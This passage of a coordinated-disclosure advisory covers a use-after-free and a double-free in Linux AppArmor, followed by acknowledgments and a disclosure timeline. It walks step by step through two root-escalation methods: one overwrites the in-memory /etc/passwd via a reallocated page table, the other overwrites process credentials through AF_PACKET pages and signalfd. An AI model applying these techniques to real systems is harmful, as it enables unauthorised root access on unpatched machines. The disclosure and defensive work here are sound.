0120: 80. 1e. 8e. ff. ff. 10. 399 4bK 83. 1e. 8e. ff. ff. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
0140: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 48H 91. 2d- 80. 1e. 8e. ff. ff. 48H 91. 2d-
0160: 80. 1e. 8e. ff. ff. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
0180: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
01a0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
01c0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
01e0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
0200: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
0220: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
0240: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
0260: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
0280: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 80. 92. 2d- 80. 1e. 8e. ff. ff. 80. 92. 2d- 80. 1e. 8e. ff. ff. 00. 00. 00.
02a0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 28( 3c< 04. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
02c0: 00. 00. 00. 00. 00. b8. 92. 2d- 80. 1e. 8e. ff. ff. b8. 92. 2d- 80. 1e. 8e. ff. ff. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
02e0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. e0. 92. 2d- 80. 1e. 8e. ff. ff. e0. 92. 2d- 80. 1e. 8e. ff. ff. 00. 00. 00.
0300: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 2c, 3c< 04. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
0320: 00. 00. 00. 00. 00. 18. 93. 2d- 80. 1e. 8e. ff. ff. 18. 93. 2d- 80. 1e. 8e. ff. ff. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
0340: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 40@ 93. 2d- 80. 1e. 8e. ff. ff. 40@ 93. 2d- 80. 1e. 8e. ff. ff. 00. 00. 00.
0360: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 300 3c< 04. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
0380: 00. 00. 00. 00. 00. 78x 93. 2d- 80. 1e. 8e. ff. ff. 78x 93. 2d- 80. 1e. 8e. ff. ff. 00. 00. 00. 00. 00. 00. 00. 00. c0. 89. 83.
03a0: 80. 1e. 8e. ff. ff. 01. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 80. ff. ff. ff. ff. ff. ff. ff. 7f. 00. 00. 00.
03c0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 74t 6dm 70p 66f 73s 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00.
03e0: 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 00. 5c\ fd. 6dm 46F a2. 1e. 42B 5f_ b3. b6. 300 db. 1a. dd. dc. fe. 00. 00. 00.
0400: 00.
0401.
------------------------------------------------------------------------


========================================================================
A use-after-free
========================================================================

The empty page is ripped
The empty page has slipped
    -- Sonic Youth, "The Empty Page"

The third kernel vulnerability that we discovered in AppArmor's code is a use-after-free. When we load a new profile (by write()ing its binary form to AppArmor's .load file), AppArmor records this raw, binary profile (in a compressed form), plus metadata, in an aa_loaddata structure, allocated in the kernel's kmalloc-192 slab cache:

------------------------------------------------------------------------
 99 struct aa_loaddata {
100         struct kref count;
101         struct list_head list;
102         struct work_struct work;
103         struct dentry *dents[AAFS_LOADDATA_NDENTS];
104         struct aa_ns *ns;
105         char *name;
106         size_t size;                    /* the original size of the payload */
107         size_t compressed_size;         /* the compressed size of the payload */
108         long revision;                  /* the ns policy revision this caused */
109         int abi;
110         unsigned char *hash;
...
116         char *data;
117 };
------------------------------------------------------------------------

Various members of this aa_loaddata structure are readable through directory entries (dentries) in AppArmor's filesystem; for example, if we cat the compressed_size file, the open() syscall acquires a reference to this file's dentry, which contains a pointer (d_inode) to its inode, which contains a pointer (i_private) to its aa_loaddata structure:

------------------------------------------------------------------------
$ strace cat /sys/kernel/security/apparmor/policy/raw_data/0/compressed_size
...
openat(AT_FDCWD, "/sys/kernel/security/apparmor/policy/raw_data/0/compressed_size", O_RDONLY) = 3
...
read(3, "408\n", 131072) = 4
...
------------------------------------------------------------------------
1423 SYSCALL_DEFINE3(open, const char __user *, filename, int, flags, umode_t, mode)
....
1427         return do_sys_open(AT_FDCWD, filename, flags, mode);
------------------------------------------------------------------------
1416 long do_sys_open(int dfd, const char __user *filename, int flags, umode_t mode)
....
1419         return do_sys_openat2(dfd, filename, &how);
------------------------------------------------------------------------
1388 static long do_sys_openat2(int dfd, const char __user *filename,
....
1404         struct file *f = do_filp_open(dfd, tmp, &op);
------------------------------------------------------------------------
3821 struct file *do_filp_open(int dfd, struct filename *pathname,
....
3829         filp = path_openat(&nd, op, flags | LOOKUP_RCU);
------------------------------------------------------------------------
3782 static struct file *path_openat(struct nameidata *nd,
....
3802                 error = do_open(nd, file, op);
------------------------------------------------------------------------
3601 static int do_open(struct nameidata *nd,
....
3645         error = vfs_open(&nd->path, file);
------------------------------------------------------------------------
1084 int vfs_open(const struct path *path, struct file *file)
....
1087         return do_dentry_open(file, d_backing_inode(path->dentry), NULL);
------------------------------------------------------------------------
902 static int do_dentry_open(struct file *f,
...
940         error = security_file_open(f);
...
951                 open = f->f_op->open;
...
953                 error = open(inode, f);
------------------------------------------------------------------------
1240 static int seq_rawdata_open(struct inode *inode, struct file *file,
....
1243         struct aa_loaddata *data = __aa_get_loaddata(inode->i_private);
....
1246         if (!data)
1247                 /* lost race this ent is being reaped */
1248                 return -ENOENT;
------------------------------------------------------------------------
1302 static int seq_rawdata_compressed_size_show(struct seq_file *seq, void *v)
....
1304         struct aa_loaddata *data = seq->private;
....
1306         seq_printf(seq, "%zu\n", data->compressed_size);
------------------------------------------------------------------------

While auditing AppArmor's code, we spotted several puzzling comments: "no refcount on inode rawdata", "no refcounts on i_private" -- although the aa_loaddata structure is referenced by its dentries (via the d_inode and i_private pointers), these references are not added to aa_loaddata's count member; in other words, they are not reference-counted.

We tried to understand why this is secure, but soon realized that these references to the aa_loaddata structure should, in fact, be counted. Suppose a racing, concurrent thread drops the very last reference to the aa_loaddata structure (by removing the corresponding AppArmor profile), and therefore kfree()s it:

- after open() acquires a reference to the compressed_size file's dentry (in path_openat(), before the call to do_open() at line 3802),

- but before open() calls the compressed_size file's seq_rawdata_open() (in do_dentry_open(), at line 953).

Then, when seq_rawdata_open() is called, the aa_loaddata structure has already been kfree()d, and is used-after-free at line 1243, and potentially also at line 1306.

Initially, we thought that we would never be able to win this race condition (between line 3802 and line 953), for three reasons:

1/ When the last reference to the aa_loaddata structure is dropped (when its count member drops to zero), this aa_loaddata structure is not immediately kfree()d, but scheduled for a delayed kfree():

------------------------------------------------------------------------
162 static inline void aa_put_loaddata(struct aa_loaddata *data)
...
165                 kref_put(&data->count, aa_loaddata_kref);
------------------------------------------------------------------------
133 void aa_loaddata_kref(struct kref *kref)
...
135         struct aa_loaddata *d = container_of(kref, struct aa_loaddata, count);
...
138                 INIT_WORK(&d->work, do_loaddata_free);
139                 schedule_work(&d->work);
------------------------------------------------------------------------
115 static void do_loaddata_free(struct work_struct *work)
...
117         struct aa_loaddata *d = container_of(work, struct aa_loaddata, work);
...
130         kfree_sensitive(d);
------------------------------------------------------------------------

As a result, the aa_loaddata structure might not be kfree()d yet when seq_rawdata_open() is called, which would prevent the use-after-free.

2/ In any case, simply calling seq_rawdata_open() with a recently kfree()d aa_loaddata structure is not enough, because do_loaddata_free() actually calls kfree_sensitive(), which first memset()s this aa_loaddata structure to zero and causes seq_rawdata_open() to return immediately at line 1248 (because the count member of this already kfree()d aa_loaddata structure is zero), without an exploitable use-after-free:

------------------------------------------------------------------------
132 __aa_get_loaddata(struct aa_loaddata *data)
...
134         if (data && kref_get_unless_zero(&(data->count)))
135                 return data;
...
137         return NULL;
------------------------------------------------------------------------
 94  * kref_get_unless_zero - Increment refcount for object unless it is zero.
 ..
 97  * Return non-zero if the increment succeeded. Otherwise return 0.
...
109 static inline int __must_check kref_get_unless_zero(struct kref *kref)
...
111         return refcount_inc_not_zero(&kref->refcount);
------------------------------------------------------------------------

Consequently, we must not only kfree() the aa_loaddata structure during the race-condition window, but we must also re-allocate its memory with another useful object whose first four bytes (the count member of this already kfree()d aa_loaddata structure) are not all zeros.

3/ This race-condition window (between line 3802 and line 953) seemed very narrow; in particular, it does not seem to contain any user-space access that could be blocked with FUSE, for example.

Fortunately, we have an ace up our sleeve: in the middle of the race-condition window, open() calls security_file_open() (at line 940), which calls apparmor_file_open(); and because we have the ability to load new arbitrary AppArmor profiles, we can load specially crafted profiles that slow down security_file_open(), and therefore greatly widen the race-condition window and allow us to easily win this race condition. We developed two alternative methods, each with its own advantages and disadvantages:

a/ Leveraging the out-of-bounds read in aa_dfa_match() (described in the previous section), we slow down security_file_open(), and hence the thread that open()s the compressed_size file, by confining this thread with an AppArmor profile whose DFA reads megabytes or even gigabytes of out-of-bounds memory; this takes several seconds and gives us plenty of time to reliably win the race condition in open().
Disadvantages:

- this method requires an AppArmor namespace and an unprivileged user namespace, which would not otherwise be required to exploit this use-after-free: because our DFA is rather large (it has ~64K states), we must write() the corresponding profile directly to AppArmor's .load file (to the best of our knowledge, write()s via su's stdout in pty mode are limited to 4KB);

- occasionally, this out-of-bounds read of megabytes or gigabytes of kernel memory causes an Oops (because of a "not-present page"), but on Ubuntu and Debian at least, such an Oops does not cause a system crash: we can simply re-run our exploit with a slightly different DFA.

b/ Alternatively, to slow down the thread that open()s the compressed_size file, we confine it with thousands of stacked AppArmor profiles ("myprofile1//&myprofile2//&myprofile3//&etc", for example), and specify a ~4KB attach_disconnected.path for each one of these profiles: apparmor_file_open() is forced to read millions of bytes (the number of stacked profiles multiplied by the length of attach_disconnected.path), which takes hundreds of milliseconds and gives us enough time to reliably win the race condition in open().

Disadvantage:

- thousands of stacked AppArmor profiles consume a large amount of memory, which can be a problem on small systems.

We succeeded in reliably winning this race condition, but how do we exploit the resulting use-after-free? Our initial strategy failed (we were planning to re-allocate the kfree()d aa_loaddata structure with a temporary extended-attribute (xattr) or user-key buffer), because we completely overlooked the fact that the CONFIG_RANDOM_KMALLOC_CACHES mitigation is enabled by default in Ubuntu 24.04.3: with a high probability (15/16), useful objects such as xattr or user-key buffers are never allocated in the same slab cache as our kfree()d aa_loaddata structure (which is allocated in one of the "kmalloc-(|rnd-..-)192" slab caches).
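The 15/16 figure can be illustrated with a small user-space model of how, as far as we understand mainline Linux (include/linux/slab.h), CONFIG_RANDOM_KMALLOC_CACHES picks a cache for a normal kmalloc() call: the allocation site's return address, XORed with a per-boot random seed, is hashed with the generic multiplicative hash_64() into one of RANDOM_KMALLOC_CACHES_NR + 1 = 16 copies of each size class. The constants below are our assumptions about the kernel, the helper names are hypothetical, and the caller and seed values are made up; this is a sketch, not kernel code.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed mainline values: 15 random copies plus the normal cache. */
#define GOLDEN_RATIO_64          0x61C8864680B583EBULL
#define RANDOM_KMALLOC_CACHES_NR 15
#define RANDOM_CACHE_BITS        4   /* ilog2(RANDOM_KMALLOC_CACHES_NR + 1) */

/* Generic 64-bit multiplicative hash: keep the top `bits` bits of the product. */
static unsigned int hash_64(uint64_t val, unsigned int bits)
{
	assert(bits > 0 && bits <= 32);
	return (unsigned int)((val * GOLDEN_RATIO_64) >> (64 - bits));
}

/* Copy (0..15) chosen for an allocation site under a given boot seed. */
static unsigned int random_cache_index(uint64_t caller, uint64_t seed)
{
	return hash_64(caller ^ seed, RANDOM_CACHE_BITS);
}

/* Copy 0 is the plain "kmalloc-192"; copies 1..15 are "kmalloc-rnd-NN-192". */
static void cache_name_192(unsigned int idx, char *buf, size_t len)
{
	if (idx == 0)
		snprintf(buf, len, "kmalloc-192");
	else
		snprintf(buf, len, "kmalloc-rnd-%02u-192", idx);
}
```

For example, random_cache_index(1, 0) selects copy 6 ("kmalloc-rnd-06-192"). Because the copy is fixed per allocation site for a given boot, all aa_loaddata structures share one copy (which is why loading and removing minimal profiles works for the cross-cache stage), whereas an object allocated elsewhere, such as an xattr or user-key buffer, lands in that same copy only if its own site happens to hash to the same index, roughly a 1-in-16 chance for unrelated sites.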
For more information on the CONFIG_RANDOM_KMALLOC_CACHES mitigation:

https://sam4k.com/exploring-linux-random-kmalloc-caches/ (by Sam Page)
https://dustri.org/b/some-notes-on-randomized-slab-caches-for-kmalloc.html (by Julien Voisin)

Sadly, and as highlighted repeatedly by various researchers, the CONFIG_RANDOM_KMALLOC_CACHES mitigation does not protect at all against cross-cache attacks:

https://x.com/andreyknvl/status/1700267669336080678 (by Andrey Konovalov)
https://infosec.exchange/@minipli/111045336853055793 (by Mathias Krause)
https://a13xp0p0v.github.io/2025/09/02/kernel-hack-drill-and-CVE-2024-50264.html (by Alexander Popov)

We therefore decided to exploit the use-after-free of the aa_loaddata structure by simply "Freeing the object's page to the page allocator" and "Reallocating the victim page as a pagetable", from Jann Horn's beautifully elegant attack against CVE-2020-29661:

https://projectzero.google/2021/10/how-simple-linux-kernel-memory.html

In a nutshell:

- we perform the cross-cache dance from "Freeing the object's page to the page allocator", and give the page of memory (where our kfree()d aa_loaddata structure was allocated) back to the page allocator (note: to allocate and free the numerous objects required by this first stage of the attack, we load and remove numerous minimal AppArmor profiles, whose aa_loaddata structures are guaranteed to be allocated in the same random slab cache as our kfree()d aa_loaddata structure);

- we carry out the second stage of the attack, from "Reallocating the victim page as a pagetable", and re-allocate the page of memory (where our kfree()d aa_loaddata structure was allocated) as a page table (PT) whose page-table entries (PTEs) all correspond to the first mmap()ed page of /etc/passwd (in read-only mode, since we do not have write access to this file);

- we verify that the first two stages of the attack succeeded, by read()ing the compressed_size member of our kfree()d aa_loaddata structure (through our file descriptor to the compressed_size file, which we open()ed during the race condition): if it looks like a PTE (a read-only PTE), then we successfully re-allocated the page where our kfree()d aa_loaddata structure was allocated, and its count and compressed_size members are now PTEs for /etc/passwd (note: in the unlikely event that bit 31 of this PTE is set, i.e., the 32-bit count member of our kfree()d aa_loaddata structure is negative, "saturated", our exploit fails, but the kernel only issues a warning, and we can simply re-run our exploit with a target file other than /etc/passwd);

- we add 0x42 references to the count member of our kfree()d aa_loaddata structure, by open()ing our /proc/pid/fd/n to the compressed_size file (0x42 times), thus turning on the _PAGE_DIRTY bit (0x40) and _PAGE_RW bit (0x2) of the PTE that corresponds to this count member: one of our mmap()ed pages of /etc/passwd is now writable;

- we write to this writable mmap()ed page of /etc/passwd (more precisely, we pread() into it; this page is the page-cached, in-memory copy of /etc/passwd, not the original, on-disk /etc/passwd), and overwrite its first line ("root:x:0:0:root:/root:/bin/bash\n") with a passwordless first line ("root::0:0:root:/root:/bin/bash\n");

- we drop 0x42 references from the count member of our kfree()d aa_loaddata structure, by close()ing our 0x42 file descriptors to the compressed_size file, thus turning off the _PAGE_DIRTY and _PAGE_RW bits of the PTE that corresponds to this count member (i.e., we restore this PTE to its original, read-only value);

- we execute su and instantly obtain a root shell with full privileges, thanks to our passwordless first line in /etc/passwd.

On Ubuntu 24.04.3, this exploit is extremely reliable (most likely because the CONFIG_RANDOM_KMALLOC_CACHES mitigation greatly reduces the slab-cache noise); on Debian 13.1, a few re-runs of the exploit may be needed (the CONFIG_RANDOM_KMALLOC_CACHES mitigation is not enabled by default in Debian 13.1).
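Both point 2/ above and the 0x42 trick hinge on how the 32-bit count member is interpreted. On x86-64 (little-endian), once the page is reused as a page table, count overlaps the low 32 bits of the first PTE, so every successful kref_get_unless_zero() adds 1 to that PTE. The user-space model below only does arithmetic and never touches real page tables; it shows why a zeroed count (left by kfree_sensitive()) makes the "get" fail, and why 0x42 extra references turn on _PAGE_RW (0x2) and _PAGE_DIRTY (0x40) of a read-only PTE. The flag values are the architectural x86-64 ones; the sample PTE (page frame 0x123456 with Present, User, Accessed, and NX) is made up, the helper names are hypothetical, and the kernel's real handling of a negative refcount_t (warning, saturation) is only flagged, not modeled.

```c
#include <assert.h>
#include <stdint.h>

/* x86-64 page-table-entry flag bits (architectural values). */
#define PTE_PRESENT  0x001ULL
#define PTE_RW       0x002ULL   /* _PAGE_RW */
#define PTE_USER     0x004ULL
#define PTE_ACCESSED 0x020ULL
#define PTE_DIRTY    0x040ULL   /* _PAGE_DIRTY */
#define PTE_NX       (1ULL << 63)

enum get_result { GET_OK, GET_ZERO, GET_NEGATIVE };

/*
 * Model of kref_get_unless_zero() on a 32-bit count stored in the low half
 * of a 64-bit PTE. Zero: the get fails (__aa_get_loaddata() returns NULL).
 * Bit 31 set: negative for refcount_t; the kernel warns (not modeled here).
 */
static enum get_result count_get_unless_zero(uint64_t *pte)
{
	uint32_t count = (uint32_t)*pte;

	if (count == 0)
		return GET_ZERO;
	if (count & 0x80000000u)
		return GET_NEGATIVE;
	*pte = (*pte & 0xFFFFFFFF00000000ULL) | (uint64_t)(count + 1);
	return GET_OK;
}

/* Model of dropping one (non-final) reference: decrement the low 32 bits. */
static void count_put(uint64_t *pte)
{
	uint32_t count = (uint32_t)*pte;

	assert(count > 1);
	*pte = (*pte & 0xFFFFFFFF00000000ULL) | (uint64_t)(count - 1);
}

/* Take up to n references; returns how many succeeded. */
static unsigned int take_refs(uint64_t *pte, unsigned int n)
{
	unsigned int done = 0;

	while (done < n && count_get_unless_zero(pte) == GET_OK)
		done++;
	return done;
}

/* Drop n references taken earlier with take_refs(). */
static void drop_refs(uint64_t *pte, unsigned int n)
{
	while (n--)
		count_put(pte);
}
```

Adding 0x42 behaves like setting the two bits only because both are clear in a read-only, not-yet-dirty PTE (0x25 + 0x42 = 0x67, with no carry into other bits); dropping the same number of references restores the original value.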
========================================================================
A double-free
========================================================================

We paint a zero on his hand
    -- Sonic Youth, "Teen Age Riot"

The fourth kernel vulnerability that we discovered in AppArmor's code is a double-free. We decided to exploit this vulnerability on Debian 13.1; Ubuntu 24.04.3 is probably also exploitable, but requires a different exploitation strategy because of the CONFIG_RANDOM_KMALLOC_CACHES mitigation (indeed, we do not perform a cross-cache attack in our exploit against Debian 13.1).

In aa_replace_profiles() (which parses the profiles that we write() to AppArmor's .load and .replace files), if no profile explicitly specifies a namespace in its header (i.e., ns_name is still NULL after line 1071), but one profile implicitly specifies a namespace in its profile name, for example ":mynamespace:myprofile" (i.e., ent->ns_name is not NULL, at line 1089), then ns_name is set to this ent->ns_name (at line 1095), and is kfree()d a first time (at line 1262, by aa_load_ent_free() at line 1279) and a second time (at line 1270): a double-free vulnerability, in any slab cache between kmalloc-8 and kmalloc-256 (because the length of an AppArmor namespace name can be anywhere between 1 and 255 bytes, i.e., NAME_MAX).

------------------------------------------------------------------------
1057 ssize_t aa_replace_profiles(struct aa_ns *policy_ns, struct aa_label *label,
....
1060         const char *ns_name = NULL, *info = NULL;
....
1071         error = aa_unpack(udata, &lh, &ns_name);
....
1082                 if (ns_name) {
....
1089                 } else if (ent->ns_name) {
....
1095                         ns_name = ent->ns_name;
....
1246                 if (ent->old) {
....
1248                         __replace_profile(ent->old, ent->new);
....
1262                 aa_load_ent_free(ent);
....
1270         kfree(ns_name);
------------------------------------------------------------------------
1273 void aa_load_ent_free(struct aa_load_ent *ent)
....
1279                 kfree(ent->ns_name);
------------------------------------------------------------------------

To successfully exploit this double-free (and to avoid a system crash), we must re-allocate ns_name's memory after the first kfree() (line 1262) but before the second kfree() (line 1270). Initially, we thought that we would not be able to win this race condition, but we eventually realized that if we write() numerous concatenated profiles to AppArmor's .replace file, and if these profiles contain subprofiles, then __replace_profile() is called numerous times (at line 1248) and each call loops over each of these subprofiles (at lines 949-967), which takes considerable time. For example, 1024 profiles that contain 16 subprofiles each widen the race-condition window to several seconds and allow us to reliably win this race condition.

------------------------------------------------------------------------
941 static void __replace_profile(struct aa_profile *old, struct aa_profile *new)
...
947         list_splice_init_rcu(&old->base.profiles, &lh, synchronize_rcu);
...
949         list_for_each_entry_safe(child, tmp, &lh, base.list) {
...
964                 rcu_assign_pointer(child->parent, aa_get_profile(new));
965                 list_add_rcu(&child->base.list, &new->base.profiles);
...
967         }
------------------------------------------------------------------------

But how do we exploit the resulting double-free? Our initial strategy failed miserably: we were planning to re-allocate ns_name's memory with a temporary xattr buffer, but completely overlooked the fact that these allocations "Use dedicated slab buckets for memdup_user()", because the CONFIG_SLAB_BUCKETS mitigation is enabled by default in Debian 13.1.
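Independently of how it is exploited, the root cause of this double-free is an ownership problem: after line 1095, ns_name and ent->ns_name alias the same buffer, and both owners free it. The user-space model below reproduces this pattern with hypothetical stand-in types (struct name_buf, struct load_ent) and a fake_kfree() that only counts frees, so the demonstration never performs a real double-free. The second function shows one generic way to avoid the aliasing (transferring ownership by clearing the entry's pointer); it is an illustration only, not necessarily what the upstream AppArmor patch does.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for a kmalloc()ed namespace name: counts "frees". */
struct name_buf {
	const char *str;
	int frees;
};

/* Hypothetical stand-in for struct aa_load_ent: owns its ns_name. */
struct load_ent {
	struct name_buf *ns_name;	/* e.g. from ":mynamespace:myprofile" */
};

/* Records a free instead of performing one. */
static void fake_kfree(struct name_buf *n)
{
	if (n)
		n->frees++;
}

/* Stand-in for aa_load_ent_free(): frees the entry's own ns_name. */
static void load_ent_free(struct load_ent *ent)
{
	fake_kfree(ent->ns_name);
}

/* Buggy pattern: alias without transfer, then free through both owners. */
static int replace_aliased(struct name_buf *name)
{
	struct load_ent ent = { .ns_name = name };
	struct name_buf *ns_name = NULL;

	if (!ns_name && ent.ns_name)
		ns_name = ent.ns_name;	/* cf. line 1095 */
	load_ent_free(&ent);		/* first free, cf. lines 1262/1279 */
	fake_kfree(ns_name);		/* second free, cf. line 1270 */
	return name->frees;
}

/* Ownership transfer: the entry no longer owns the buffer once aliased. */
static int replace_transferred(struct name_buf *name)
{
	struct load_ent ent = { .ns_name = name };
	struct name_buf *ns_name = NULL;

	if (!ns_name && ent.ns_name) {
		ns_name = ent.ns_name;
		ent.ns_name = NULL;
	}
	load_ent_free(&ent);		/* frees nothing */
	fake_kfree(ns_name);		/* the only free */
	return name->frees;
}
```

In the aliased version the same buffer is released twice, which is exactly the window the exploit targets; in the transferred version each buffer has exactly one owner at every point, so it is released once.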
We therefore decided to simply allocate another object instead (a temporary user-key buffer), and closely followed the Crusaders of Rust's TL;DR for their extremely impressive attack against CVE-2025-38001:

https://syst3mfailure.io/rbtree-family-drama/

In a nutshell:

- immediately after the first kfree() of ns_name, we re-allocate its memory with a temporary user-key buffer (via the add_key() syscall or the keyctl(KEYCTL_UPDATE) syscall), but we block the copy of the last bytes of this user-key buffer (from user space to kernel space) with FUSE (it would otherwise be kfree()d automatically);

- immediately after the second kfree() of ns_name, which actually kfree()s our user-key buffer (whose copy is still blocked by FUSE), we re-allocate and therefore overwrite its memory with an AF_PACKET page vector (an array of pointers to single-page buffers in kernel space) -- in reality, we allocate numerous AF_PACKET page vectors (via the setsockopt(PACKET_TX_RING) syscall), for a reason that will become clear below;

- we unblock the copy of our user-key buffer (which was still blocked by FUSE, and was mostly overwritten by our AF_PACKET page vector), and we read back this user-key buffer (via the keyctl(KEYCTL_READ) syscall), thereby disclosing the pointers from our AF_PACKET page vector -- this is essentially the clever "One Weird Trick" from Valentina Palmiotti's exploit for CVE-2021-41073 (but with a user-key instead of an xattr):

  https://chomp.ie/Blog+Posts/Put+an+io_uring+on+it+-+Exploiting+the+Linux+Kernel

- since the unblocking above automatically kfree()d our user-key buffer, and hence our AF_PACKET page vector, we immediately re-allocate and therefore overwrite its memory with another temporary user-key buffer (whose copy from user space to kernel space is also blocked by FUSE): an identical copy of our originally disclosed AF_PACKET page vector, except for its very first pointer, which we overwrite with a slightly higher pointer than the highest pointer of this AF_PACKET page vector -- with high probability, this overwritten pointer is equal to one of the pointers from one of our *other* numerous AF_PACKET page vectors;

- as a result, the page of memory that corresponds to this overwritten pointer is artificially referenced twice, in two different AF_PACKET page vectors (but one of these two references is uncounted, and will lead to a use-after-free): if we mmap() all of the pages from all of our AF_PACKET page vectors (through their AF_PACKET file descriptors), and if we write a unique tag to each one of these mmap()ed pages, then we can detect the page that is referenced twice (and mmap()ed twice);

- we munmap() this page (twice) and close() the first of the two AF_PACKET file descriptors that reference this page, which drops its reference count to zero and gives it back to the page allocator (but we still have an uncounted reference to this free page, through the second of the two aforementioned AF_PACKET file descriptors);

- we immediately re-allocate this free page as a pipe buffer (by write()ing to a pipe whose buffer was set to a single page via the fcntl(F_SETPIPE_SZ) syscall), then free it again (by close()ing the second and last AF_PACKET file descriptor that still references it), and immediately re-allocate it again as a page full of file structures (via numerous signalfd(-1) syscalls), thus gaining arbitrary read and write access from and to this page (and all of the file structures it contains) via read()s and write()s from and to our pipe;

- we read() the contents of this page (and all of its file structures) from our pipe, which discloses f_cred, a pointer to our process's cred structure (credentials such as uid, euid, gid, etc.), and private_data, a pointer to a signalfd_ctx structure (one unsigned long, sigmask);

- we overwrite the private_data pointer with the f_cred pointer, by write()ing a modified version of this page (and its file structures) to our pipe, and call signalfd() to write zeros (the most significant bytes of a sigmask) to private_data (which we overwrote with f_cred), thus overwriting the uid credentials of our process with zeros: at long last, our process is now running as the root user.

Note: because this exploitation strategy uses AF_PACKET page vectors, it requires a network namespace (and hence an unprivileged user namespace); however, it should be possible to develop another exploitation strategy that does not require a user namespace, which is left as an exercise for the interested reader.


========================================================================
Acknowledgments
========================================================================

We thank Ubuntu's security team and Canonical's AppArmor developers (John Johansen, Georgia Garcia, Maxime Belair, Massimiliano Pellizzer, and Cengiz Can, in particular) for their hard work on this release. We also thank Sudo's maintainer (Todd C. Miller), Debian's security team (Salvatore Bonaccorso in particular), SUSE's security team (Matthias Gerstner and Marcus Meissner in particular), the Linux kernel security team (Greg Kroah-Hartman and Willy Tarreau in particular), and the members of the linux-distros mailing list.

None of this research would have been possible without the public work of Jann Horn and the Crusaders of Rust. And more generally, we sincerely thank all the security researchers who continue to publish their work; they make a world of difference.
We also thank the Phrack staff, old and new, for keeping the spirit and the scene alive, and Gerardo Richarte for his kind words about our work:

https://phrack.org/issues/72/2

Finally, we dedicate this advisory to Sebastian Krahmer:

https://www.thc.org/404/stealth/eulogy.txt


========================================================================
Timeline
========================================================================

2025-07-10: Sent a first batch of vulnerabilities to Ubuntu's security team and Canonical's AppArmor developers.

2025-08-01: Sent a second batch of vulnerabilities to Ubuntu's security team and Canonical's AppArmor developers.

2025-09-09: Sent a third batch of vulnerabilities to Ubuntu's security team and Canonical's AppArmor developers.

2025-10-20: Sent a draft of our advisory to Ubuntu's security team and Canonical's AppArmor developers.

2025-12-15: Sent a mail to Ubuntu's security team and Canonical's AppArmor developers to share our worries about the state of this vulnerability disclosure.

2026-01-14: Sent another mail to Ubuntu's security team and Canonical's AppArmor developers to share our worries about the state of this vulnerability disclosure.

2026-02-11: Together with Canonical's AppArmor developers, fixed the Coordinated Release Date to 2026-03-03.

2026-02-17: Contacted Sudo's maintainer.

2026-02-17: Received a first version of the patches from Canonical's AppArmor developers.

2026-02-18: Contacted Debian's security team and SUSE's security team.

2026-02-19: Sent a first review of the patches to Ubuntu's security team and Canonical's AppArmor developers.

2026-02-20: Sent the first version of the patches to Debian's security team and SUSE's security team.

2026-02-24: Contacted the Linux kernel security team (security@kernel).

2026-02-26: Received a second version of the patches from Canonical's AppArmor developers.
2026-02-26: Sent the second version of the patches and a draft of our advisory to the linux-distros mailing list (linux-distros@openwall).

2026-02-27: Sent a second review of the patches to Ubuntu's security team and Canonical's AppArmor developers.

2026-02-28: Contacted the Linux kernel CVE assignment team (cve@kernel).

2026-03-03: Together with Canonical's AppArmor developers, postponed the Coordinated Release Date (one of the patches was incomplete), until "the patches are published upstream in Linus's tree".

2026-03-03: Received a third version of the patches from Canonical's AppArmor developers.

2026-03-04: Sent a third review of the patches to Canonical's AppArmor developers.

2026-03-05: Received a fourth version of the patches from Canonical's AppArmor developers.

